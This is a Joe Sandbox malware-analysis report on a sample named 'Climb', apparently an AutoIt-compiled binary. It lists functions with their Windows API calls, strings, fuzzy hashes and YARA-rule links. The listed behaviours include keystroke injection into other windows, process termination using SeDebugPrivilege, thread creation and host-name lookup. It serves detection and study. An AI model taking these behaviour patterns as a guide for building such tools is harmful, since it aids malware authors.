Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: c21558d6f4d30619c9cb36a9a87c047faaafee95a26d8480d6f3e2f4c578d1ee
Instruction ID: ee5170c0fa03baf568d91ab497fc705b234c7cf59ec5c2e11ff689f10cf133cc
Opcode Fuzzy Hash: c21558d6f4d30619c9cb36a9a87c047faaafee95a26d8480d6f3e2f4c578d1ee
Instruction Fuzzy Hash: 57316D71500706AFDB229FA5CD44ABABBB9FF08320B54451EFA5B86710C731E915EBA0

Function 00AC2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC43AD
Part of subcall function 00AC4393: GetCurrentThreadId.KERNEL32 ref: 00AC43B4
Part of subcall function 00AC4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC2F00), ref: 00AC43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC2F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AC2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00AC2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AC2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00AC2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AC2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AC2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00AC2F74

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e027852271e0df11603411047f9b9f5045ba678a619d476eacda7a7a71f7be2e
Instruction ID: e24157102760863d15e3ef725bcb399a198e9a27ceda2cc205599e38a6939c64
Opcode Fuzzy Hash: e027852271e0df11603411047f9b9f5045ba678a619d476eacda7a7a71f7be2e
Instruction Fuzzy Hash: 0A01D8307942147BFB11A7A89C8AF693F5ADB5DB51F110019F318AE1E0C9E15445CAAD

Function 00AC2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00AC1D95,?,?,00000000), ref: 00AC2159
HeapAlloc.KERNEL32(00000000,?,00AC1D95,?,?,00000000), ref: 00AC2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AC1D95,?,?,00000000), ref: 00AC2175
GetCurrentProcess.KERNEL32(?,00000000,?,00AC1D95,?,?,00000000), ref: 00AC217D
DuplicateHandle.KERNEL32(00000000,?,00AC1D95,?,?,00000000), ref: 00AC2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AC1D95,?,?,00000000), ref: 00AC2190
GetCurrentProcess.KERNEL32(00AC1D95,00000000,?,00AC1D95,?,?,00000000), ref: 00AC2198
DuplicateHandle.KERNEL32(00000000,?,00AC1D95,?,?,00000000), ref: 00AC219B
CreateThread.KERNEL32(00000000,00000000,00AC21C1,00000000,00000000,00000000), ref: 00AC21B5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e746952cb9a3de80e45211cffdd5ad7ad51475df93abe5098deddd8c52761db5
Instruction ID: fd0a96d1778587cfb8afb4e4f51c03730222d004a1a9a1e70f34e93c2c455ccb
Opcode Fuzzy Hash: e746952cb9a3de80e45211cffdd5ad7ad51475df93abe5098deddd8c52761db5
Instruction Fuzzy Hash: 4501A4B5240308BFEB11EBE5DC8DF6B7BADEB88711F018511FA05DB2A1CA709811CB24

Function 00AEAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00ACDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00ACDDAC
Part of subcall function 00ACDD87: Process32FirstW.KERNEL32(00000000,?), ref: 00ACDDBA
Part of subcall function 00ACDD87: CloseHandle.KERNEL32(00000000), ref: 00ACDE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AEABCA
GetLastError.KERNEL32 ref: 00AEABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AEAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00AEACC5
GetLastError.KERNEL32(00000000), ref: 00AEACD0
CloseHandle.KERNEL32(00000000), ref: 00AEAD21

Strings

SeDebugPrivilege, xrefs: 00AEABEC

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: bdf676c025beceaa964afe5cb3b33552c015694291ed5975068434076c22f050
Instruction ID: 76af123b97e651fe1adf4f75ada9449ec73a427460066de02018329d5d7e6a39
Opcode Fuzzy Hash: bdf676c025beceaa964afe5cb3b33552c015694291ed5975068434076c22f050
Instruction Fuzzy Hash: 72619D74204281AFD311DF59C995F29BBE1AFA4308F18849CE4664BBA3C771FC49CB92

Function 00AF4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF43C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00AF43D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF43F0
_wcslen.LIBCMT ref: 00AF4435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF4462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF4490

Strings

SysListView32, xrefs: 00AF4393

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 838dec67c45a79364fda20722a9423747d3c91c83cef8679881f4875762609e9
Instruction ID: 1e5f085aa76079a28d970260432e1b3a6afbd2bc6c9fe2ae683d451a84f05afd
Opcode Fuzzy Hash: 838dec67c45a79364fda20722a9423747d3c91c83cef8679881f4875762609e9
Instruction Fuzzy Hash: F641AF7190031DABDB219FA4CC49BEB7BA9EF4C350F100526FA54EB291D7749990CB90

Function 00ACC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ACC6C4
IsMenu.USER32(00000000), ref: 00ACC6E4
CreatePopupMenu.USER32 ref: 00ACC71A
GetMenuItemCount.USER32(01093C30), ref: 00ACC76B
InsertMenuItemW.USER32(01093C30,?,00000001,00000030), ref: 00ACC793

Strings

0, xrefs: 00ACC66F
2, xrefs: 00ACC6FE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 64b50b4fefab4f8c2c12cb342377b5d841b95ace0c239b88a75ee3b9d28a67af
Instruction ID: d7f900c171a502bf5038f9a2049db44f5f0c51c94b63b0c9e1055babb3376a24
Opcode Fuzzy Hash: 64b50b4fefab4f8c2c12cb342377b5d841b95ace0c239b88a75ee3b9d28a67af
Instruction Fuzzy Hash: DD519C70A002059BDF11CFA8C988FAEBBF9EF48324F25415EE919E7291E7709941CF61

Function 00ACD11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00ACD1BE

Strings

stop, xrefs: 00ACD18F
question, xrefs: 00ACD177
info, xrefs: 00ACD15F
blank, xrefs: 00ACD140
warning, xrefs: 00ACD1A7

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 1c5aff199ee4c83b495f691258a234be6260313310cb17948aa63571f7b343c2
Instruction ID: bac97c92aacf018d37e93c6faa5fb3c90f497e3e1e5349f160540b3e6a9a42a6
Opcode Fuzzy Hash: 1c5aff199ee4c83b495f691258a234be6260313310cb17948aa63571f7b343c2
Instruction Fuzzy Hash: 6511EC3528C317BAE7056B54EC82EAE7BEC9F09760B25017EF904A62D1EBB45E404264

Function 00ACE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00ACE759
gethostname.WSOCK32(?,00000100), ref: 00ACE773
gethostbyname.WSOCK32(?), ref: 00ACE780
inet_ntoa.WSOCK32(?), ref: 00ACE7C2
_strcat.LIBCMT ref: 00ACE7D0
WSACleanup.WSOCK32 ref: 00ACE7F5

Strings

0.0.0.0, xrefs: 00ACE79E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 2b035a3dee471a25a1b36a6ff62931fdae11877d4359af52e3441faab2cce057
Instruction ID: cf7f6adcc33e871898c22752e41b02b97835ed8d39853556faa87606ea138e9a
Opcode Fuzzy Hash: 2b035a3dee471a25a1b36a6ff62931fdae11877d4359af52e3441faab2cce057
Instruction Fuzzy Hash: D711B4719001157FCB25F7A0DD4AFEE77BCEF05714F0101A9F515A6091EEB48A82D790

Function 00ACF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00ACF641
_wcslen.LIBCMT ref: 00ACF652
_wcslen.LIBCMT ref: 00ACF690
_wcslen.LIBCMT ref: 00ACF6C6
_wcslen.LIBCMT ref: 00ACF6F6
_wcslen.LIBCMT ref: 00ACF706
_wcslen.LIBCMT ref: 00ACF742
_wcslen.LIBCMT ref: 00ACF771

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 2e1739767a581e5cea899d8dea2c4c0ce2d362cfe6dc5f9afff5c7c50e52a463
Instruction ID: 2f3b374db400fc3b6aa8ee1436d54ee86ee4c034f8005f4dea59974974dd29e1
Opcode Fuzzy Hash: 2e1739767a581e5cea899d8dea2c4c0ce2d362cfe6dc5f9afff5c7c50e52a463
Instruction Fuzzy Hash: B7418165C10518A9DB11FBB88986FCFB7BDAF05310F518876E508E3161FA34D261C3A6

Function 00A7FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00A7FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00ABFC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00ABFC98

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: bb186387e178f22b823327856ccfb39bbf9e46d199fd46ce4fc3f1aa7f81ee3e
Instruction ID: 06913bdee9272a788b662d33fcb07d6accc9b39f4d1e37d577270b83293373db
Opcode Fuzzy Hash: bb186387e178f22b823327856ccfb39bbf9e46d199fd46ce4fc3f1aa7f81ee3e
Instruction Fuzzy Hash: 1241E9306083889EC7378B78CE9877A7FB6AB46311F28C53CE95E47965C631A981D711

Function 00AF379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00AF37B7
GetDC.USER32(00000000), ref: 00AF37BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF37CA
ReleaseDC.USER32(00000000,00000000), ref: 00AF37D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AF3812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF3823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AF6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00AF385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF387D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f55be9708a493c3e9c068c603e53305da624080d2ef82073db555492886d93aa
Instruction ID: fcf71d997d1bd722a289042bdd685ae907200ede9097386974596eaacc17dc50
Opcode Fuzzy Hash: f55be9708a493c3e9c068c603e53305da624080d2ef82073db555492886d93aa
Instruction Fuzzy Hash: 04316D72201214BFEB258F94CC89FFB3BAAEB49751F044065FE099A291C6B59D41C7A4

Function 00AE5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00AE5A8B, 00AE5DE0
Not an Object type, xrefs: 00AE5A64

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 29e931f36d34e6f64706a237a1f92b8873f5755a603537be37f83038a1da6009
Instruction ID: 4fc764f20e96f6eb0d50e9282c30093918ab2019c8cc08e5f407245d3bc83c97
Opcode Fuzzy Hash: 29e931f36d34e6f64706a237a1f92b8873f5755a603537be37f83038a1da6009
Instruction Fuzzy Hash: 44D1BF71E0064A9FDB10CFA9E895FAEB7B5FF48348F148169E915AB280E770DD41CB50

Function 00AA18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AA194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA19D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AA1B7B,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1A7B

Part of subcall function 00A93B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AA1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AA1AF7
__freea.LIBCMT ref: 00AA1B22
__freea.LIBCMT ref: 00AA1B2E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0636f8a33899edc9fc4001b92dd2758b26a75bc0545c88dc29964691e96fa24e
Instruction ID: 5fb79e8b1410cf28d69675576586fc94c525f53e3a317fd13ecdeb08c52b293c
Opcode Fuzzy Hash: 0636f8a33899edc9fc4001b92dd2758b26a75bc0545c88dc29964691e96fa24e
Instruction Fuzzy Hash: 9C91A172F00216BADF218FA4C991AEEBBB5EF0A350F184659E805E72C0E735DD45C7A0

Function 00AE4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE50A5
VariantInit.OLEAUT32(?), ref: 00AE51A6
VariantClear.OLEAUT32(?), ref: 00AE51B0
VariantClear.OLEAUT32(?), ref: 00AE520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00AE5035, 00AE5163, 00AE521B
Incorrect Object type in FOR..IN loop, xrefs: 00AE5189

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 967d933ecc4de0269d62e5fe3db786780a13a285b044c7d8b7c10b7b65cce2e1
Instruction ID: e9d0dfcb17966a19d99f8bfe20e25923e2950d823a500fc7c03d3c57a7039461
Opcode Fuzzy Hash: 967d933ecc4de0269d62e5fe3db786780a13a285b044c7d8b7c10b7b65cce2e1
Instruction Fuzzy Hash: 44918D71E00655AFDF20DFA6E848FAEBBB8AF45718F108559F505AB280D7709941CBA0

Function 00AD1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00AD1C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00AD1C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AD1DEF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d22093dd7bb477b0ea2c7612adf79b29a9f283faf8148b936fa141fe74fd26b7
Instruction ID: 94fa09d688b47600d49fea987ad6a44315925e233433041de40c35d326aee07d
Opcode Fuzzy Hash: d22093dd7bb477b0ea2c7612adf79b29a9f283faf8148b936fa141fe74fd26b7
Instruction Fuzzy Hash: 1891D175A00219AFDB01DF98C885BBEB7B5FF04721F14442AE952EB3A1E774E941CB90

Function 00AE43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE43C8
CharUpperBuffW.USER32(?,?), ref: 00AE44D7
_wcslen.LIBCMT ref: 00AE44E7
VariantClear.OLEAUT32(?), ref: 00AE467C

Part of subcall function 00AD169E: VariantInit.OLEAUT32(00000000), ref: 00AD16DE
Part of subcall function 00AD169E: VariantCopy.OLEAUT32(?,?), ref: 00AD16E7
Part of subcall function 00AD169E: VariantClear.OLEAUT32(?), ref: 00AD16F3

Strings

Incorrect Parameter format, xrefs: 00AE4403, 00AE45FE
AUTOIT.ERROR, xrefs: 00AE44DD, 00AE44E2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
